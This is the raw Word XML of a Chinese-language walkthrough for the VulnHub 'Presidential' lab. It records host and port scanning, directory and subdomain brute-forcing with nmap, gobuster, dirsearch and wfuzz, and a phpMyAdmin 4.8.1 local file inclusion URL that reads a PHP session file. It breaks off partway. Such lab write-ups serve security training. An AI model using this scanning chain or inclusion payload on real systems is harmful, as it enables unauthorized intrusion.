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6EDE2" w14:textId="08223A33" w:rsidR="006A6789" w:rsidRDefault="007355F7">
      <w:r w:rsidRPr="007355F7">
        <w:t>Presidential</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="702A470A" w14:textId="5BE10CD8" w:rsidR="007355F7" w:rsidRDefault="007355F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靶机地址：</w:t>
      </w:r>
      <w:r w:rsidR="00000000">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00000000">
        <w:instrText>HYPERLINK "https://download.vulnhub.com/presidential/Presidential.ova"</w:instrText>
      </w:r>
      <w:r w:rsidR="00000000">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00956E13">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>https://download.vulnhub.com/presidential/Presidential.ova</w:t>
      </w:r>
      <w:r w:rsidR="00000000">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E3DEC10" w14:textId="77777777" w:rsidR="007355F7" w:rsidRDefault="007355F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4D4D4D"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21259374" w14:textId="77777777" w:rsidR="007355F7" w:rsidRDefault="007355F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4D4D4D"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E769CB7" w14:textId="10146996" w:rsidR="007355F7" w:rsidRDefault="007355F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主机发现</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="395518B4" w14:textId="51329A5A" w:rsidR="007355F7" w:rsidRDefault="007355F7">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007355F7">
        <w:t>arp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007355F7">
        <w:t>-scan -l</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F05FFE3" w14:textId="0973421B" w:rsidR="007355F7" w:rsidRDefault="007355F7">
      <w:r w:rsidRPr="007355F7">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="25BBB9F6" wp14:editId="576A849E">
            <wp:extent cx="5274310" cy="1393190"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1602375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758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31C4" w14:textId="00BAF17F" w:rsidR="007355F7" w:rsidRDefault="007355F7">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>端口扫描</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1049EA69" w14:textId="0578E306" w:rsidR="007355F7" w:rsidRDefault="007355F7">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007355F7">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007355F7">
        <w:t xml:space="preserve"> --min-rate 10000 192.168.21.150</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C8B423C" w14:textId="35678D3C" w:rsidR="007355F7" w:rsidRDefault="007355F7">
      <w:r w:rsidRPr="007355F7">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="60A1F67C" wp14:editId="5DEFDCFE">
            <wp:extent cx="5274310" cy="1781175"/>
            <wp:effectExtent l="0" t="0" r="2540" b="9525"/>
            <wp:docPr id="57764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88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2243" w14:textId="0D7BEB8D" w:rsidR="007355F7" w:rsidRDefault="007355F7">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>端口服务扫描</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="658B967D" w14:textId="51182260" w:rsidR="007355F7" w:rsidRDefault="007355F7">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007355F7">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007355F7">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007355F7">
        <w:t>sV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007355F7">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007355F7">
        <w:t>sT</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007355F7">
        <w:t xml:space="preserve"> -O -p80 192.168.21.150</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B1B6F7A" w14:textId="59A3E37F" w:rsidR="007355F7" w:rsidRDefault="007355F7">
      <w:r w:rsidRPr="007355F7">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7F5B61E3" wp14:editId="6A01EF78">
            <wp:extent cx="5274310" cy="1802765"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6985"/>
            <wp:docPr id="1343448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486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529E" w14:textId="307D0E0C" w:rsidR="007355F7" w:rsidRDefault="007355F7">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞扫描</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="703268FF" w14:textId="49A9A62D" w:rsidR="007355F7" w:rsidRDefault="007355F7">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007355F7">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007355F7">
        <w:t xml:space="preserve"> --script=vuln -p80 192.168.21.150</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CA58D07" w14:textId="050F453E" w:rsidR="007355F7" w:rsidRDefault="007355F7">
      <w:r w:rsidRPr="007355F7">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="35E007CF" wp14:editId="25FBAA26">
            <wp:extent cx="5274310" cy="2546350"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6350"/>
            <wp:docPr id="131337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1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C09F" w14:textId="3D6469DC" w:rsidR="007355F7" w:rsidRDefault="007355F7">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>只有一个端口</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71872729" w14:textId="3C280AE1" w:rsidR="007355F7" w:rsidRDefault="007355F7">
      <w:r w:rsidRPr="007355F7">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="673640FD" wp14:editId="714B8D93">
            <wp:extent cx="5274310" cy="3992245"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8255"/>
            <wp:docPr id="1594932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323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6D2A" w14:textId="6CA59748" w:rsidR="007355F7" w:rsidRDefault="007355F7">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>目录扫描</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="312E3846" w14:textId="14251ED8" w:rsidR="007355F7" w:rsidRDefault="009C0BF9">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009C0BF9">
        <w:t>gobuster</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009C0BF9">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009C0BF9">
        <w:t>dir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009C0BF9">
        <w:t xml:space="preserve"> -u http://192.168.21.150 -w /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009C0BF9">
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009C0BF9">
        <w:t>/share/wordlists/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009C0BF9">
        <w:t>dirbuster</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009C0BF9">
        <w:t>/directory-list-2.3-medium.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47635970" w14:textId="25D3D4FE" w:rsidR="009C0BF9" w:rsidRDefault="009C0BF9">
      <w:r w:rsidRPr="009C0BF9">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4A9EE7AB" wp14:editId="4DFA05CA">
            <wp:extent cx="5274310" cy="1991995"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8255"/>
            <wp:docPr id="617388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889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FF72" w14:textId="78E3C66A" w:rsidR="009C0BF9" w:rsidRDefault="00553B26">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这个没用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04BC5F85" w14:textId="5582E89D" w:rsidR="00860EED" w:rsidRDefault="00553B26">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>换个工具扫一下</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="244E1910" w14:textId="5A9D80BC" w:rsidR="00C43278" w:rsidRDefault="00C43278">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C43278">
        <w:t>dirsearch</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C43278">
        <w:t xml:space="preserve"> -u "http://192.168.21.150/" -e *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0081D64D" w14:textId="1DB9A221" w:rsidR="00C43278" w:rsidRDefault="00C43278">
      <w:r w:rsidRPr="00C43278">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="758D9A23" wp14:editId="6DBA92FE">
            <wp:extent cx="5274310" cy="5066665"/>
            <wp:effectExtent l="0" t="0" r="2540" b="635"/>
            <wp:docPr id="742083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836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1097" w14:textId="749F7DCE" w:rsidR="00C43278" w:rsidRDefault="00C43278">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这里面先去看config</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F9AA4F8" w14:textId="04A9FC59" w:rsidR="00C43278" w:rsidRDefault="00C43278">
      <w:r w:rsidRPr="00C43278">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="08428793" wp14:editId="46F9ED88">
            <wp:extent cx="5274310" cy="5892800"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="106111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129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F634" w14:textId="4EABF7C8" w:rsidR="00C43278" w:rsidRDefault="005B7FAB">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>好东西哦</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57BE785E" w14:textId="19C6F526" w:rsidR="005B7FAB" w:rsidRDefault="005B7FAB">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这里只能扫到8</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>端口</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18FDD142" w14:textId="40166AF7" w:rsidR="005B7FAB" w:rsidRDefault="005B7FAB">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>接下来就只能去找一下域名了</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="544B73D8" w14:textId="32694F41" w:rsidR="005B7FAB" w:rsidRDefault="00CC1F5C">
      <w:r w:rsidRPr="00CC1F5C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0D124AAE" wp14:editId="11C7B56D">
            <wp:extent cx="1729890" cy="365792"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="133495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51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407A" w14:textId="598BF569" w:rsidR="00CC1F5C" w:rsidRDefault="00CC1F5C">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>修改域名</w:t>
      </w:r>
      <w:r w:rsidR="001D3FF9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，再扫一遍</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78C2AD2E" w14:textId="6FB73C54" w:rsidR="006D5C4C" w:rsidRDefault="00CA503B" w:rsidP="006D5C4C">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CA503B">
        <w:t>gobuster</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CA503B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CA503B">
        <w:t>dir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CA503B">
        <w:t xml:space="preserve"> -u http://192.168.21.150/ -w SecLists-master/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F9798F8" w14:textId="13CE83CF" w:rsidR="00CA503B" w:rsidRDefault="00CA503B" w:rsidP="006D5C4C">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00CA503B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="74A347CE" wp14:editId="49250A15">
            <wp:extent cx="5274310" cy="2095500"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="689193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939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973B" w14:textId="0AF71A36" w:rsidR="00CA503B" w:rsidRDefault="00CA503B" w:rsidP="006D5C4C">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>扫不出来，只剩下子域名爆破</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0233CB5C" w14:textId="14FADDC8" w:rsidR="00452649" w:rsidRDefault="007B79B6" w:rsidP="006D5C4C">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007B79B6">
        <w:t>wfuzz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007B79B6">
        <w:t xml:space="preserve"> -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -H "Host: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007B79B6">
        <w:t>FUZZ.votenow.local</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007B79B6">
        <w:t>" --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007B79B6">
        <w:t>hw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007B79B6">
        <w:t xml:space="preserve"> 854 --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007B79B6">
        <w:t>hc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007B79B6">
        <w:t xml:space="preserve"> 400 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007B79B6">
        <w:t>votenow.local</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6365868D" w14:textId="54EDCBD4" w:rsidR="007B79B6" w:rsidRDefault="00DA309B" w:rsidP="006D5C4C">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00DA309B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="41B165B9" wp14:editId="07BD613D">
            <wp:extent cx="5274310" cy="2322830"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1270"/>
            <wp:docPr id="1509391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911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F2D9" w14:textId="5D0E3BAA" w:rsidR="00DA309B" w:rsidRDefault="00DA309B" w:rsidP="006D5C4C">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>改host访问</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="411162C0" w14:textId="0DFE6DCD" w:rsidR="00DA309B" w:rsidRDefault="00DA309B" w:rsidP="006D5C4C">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00DA309B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="74C71A26" wp14:editId="2BC19D67">
            <wp:extent cx="5274310" cy="3051810"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="82194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45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370F" w14:textId="6DB9119D" w:rsidR="00DA309B" w:rsidRDefault="00DA309B" w:rsidP="006D5C4C">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>登入就行</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55441354" w14:textId="2A527267" w:rsidR="00DA309B" w:rsidRDefault="00DA309B" w:rsidP="006D5C4C">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00DA309B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="37FBB3C8" wp14:editId="0197192B">
            <wp:extent cx="5274310" cy="2774950"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6350"/>
            <wp:docPr id="1303239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391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C791" w14:textId="33AE7116" w:rsidR="00DA309B" w:rsidRDefault="00DA309B" w:rsidP="006D5C4C">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>好东西</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BE87646" w14:textId="109CDC3D" w:rsidR="00DA309B" w:rsidRDefault="00DA309B" w:rsidP="006D5C4C">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00DA309B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6CB9D1A5" wp14:editId="755757A9">
            <wp:extent cx="5274310" cy="860425"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="441262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628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0282" w14:textId="3AA7F02D" w:rsidR="00DA309B" w:rsidRDefault="00666E88" w:rsidP="006D5C4C">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这里先放着大概率不行的</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A159364" w14:textId="16CEE429" w:rsidR="0051016D" w:rsidRDefault="0051016D" w:rsidP="006D5C4C">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>版本</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ED7150B" w14:textId="25CC3010" w:rsidR="0051016D" w:rsidRDefault="0051016D" w:rsidP="006D5C4C">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="0051016D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="255C8F49" wp14:editId="6AF1A335">
            <wp:extent cx="4816257" cy="3932261"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="124554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49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9B88" w14:textId="4475EF88" w:rsidR="00666E88" w:rsidRDefault="00666E88" w:rsidP="006D5C4C">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>先去看看有没有洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0678153A" w14:textId="1D2A2720" w:rsidR="00666E88" w:rsidRDefault="00666E88" w:rsidP="006D5C4C">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00666E88">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="752BB231" wp14:editId="4312538F">
            <wp:extent cx="5274310" cy="3811270"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1094243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435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A07E" w14:textId="67878649" w:rsidR="00666E88" w:rsidRDefault="00666E88" w:rsidP="006D5C4C">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这个版本是4</w:t>
      </w:r>
      <w:r>
        <w:t>.8.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C562FFD" w14:textId="5DE7BDB3" w:rsidR="00666E88" w:rsidRDefault="00666E88" w:rsidP="006D5C4C">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00666E88">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1E655977" wp14:editId="6F841CA6">
            <wp:extent cx="5274310" cy="5286375"/>
            <wp:effectExtent l="0" t="0" r="2540" b="9525"/>
            <wp:docPr id="1094200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00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D27E" w14:textId="3201818B" w:rsidR="00666E88" w:rsidRDefault="00666E88" w:rsidP="006D5C4C">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>啊这这个是</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>winddows</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="138CBFD1" w14:textId="669C095C" w:rsidR="00666E88" w:rsidRDefault="00666E88" w:rsidP="006D5C4C">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下一个应该就是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的了</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="668AB10E" w14:textId="4E29A40C" w:rsidR="00666E88" w:rsidRDefault="00666E88" w:rsidP="006D5C4C">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00666E88">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2E872EE3" wp14:editId="44264E9E">
            <wp:extent cx="5274310" cy="1417955"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1176633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338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DB07" w14:textId="2864EC2E" w:rsidR="00666E88" w:rsidRDefault="00666E88" w:rsidP="006D5C4C">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>过程很清楚</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="279A62D8" w14:textId="6136CAC0" w:rsidR="00666E88" w:rsidRDefault="00666E88" w:rsidP="006D5C4C">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00666E88">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0E0D014B" wp14:editId="6072FE7F">
            <wp:extent cx="5274310" cy="2491105"/>
            <wp:effectExtent l="0" t="0" r="2540" b="4445"/>
            <wp:docPr id="517262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62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DF5F" w14:textId="42AAFE79" w:rsidR="00666E88" w:rsidRDefault="00666E88" w:rsidP="006D5C4C">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这里需要包含</w:t>
      </w:r>
      <w:r w:rsidR="00FE4D75">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cookie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C9EE79C" w14:textId="48A90EFF" w:rsidR="00D15CC4" w:rsidRDefault="00D15CC4" w:rsidP="006D5C4C">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00D15CC4">
        <w:t>jn284slhmdsjnbel58uruk855v80nbi1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2203780A" w14:textId="0681B7CD" w:rsidR="00666E88" w:rsidRDefault="00D15CC4" w:rsidP="006D5C4C">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00D15CC4">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3974D916" wp14:editId="52B901E0">
            <wp:extent cx="2076740" cy="971686"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1901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4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D310" w14:textId="59D7932B" w:rsidR="00666E88" w:rsidRDefault="00666E88" w:rsidP="006D5C4C">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>包含session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2606A0D6" w14:textId="7A0DF4C6" w:rsidR="00D15CC4" w:rsidRDefault="00000000" w:rsidP="006D5C4C">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:hyperlink r:id="rId26" w:history="1">
        <w:r w:rsidR="00D15CC4" w:rsidRPr="00380540">
          <w:rPr>
            <w:rStyle w:val="a3"/>
          </w:rPr>
          <w:t>http://datasafe.votenow.local/index.php?target=db_sql.php%253f/../../../../../../../../var/lib/php/session/sess_jn284slhmdsjnbel58uruk855v80nbi1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00D15CC4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（讲sess后面替换）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30FA3D47" w14:textId="53F81483" w:rsidR="00666E88" w:rsidRDefault="00D15CC4" w:rsidP="006D5C4C">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00D15CC4">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0F36777B" wp14:editId="2BE03904">
            <wp:extent cx="5274310" cy="3161665"/>
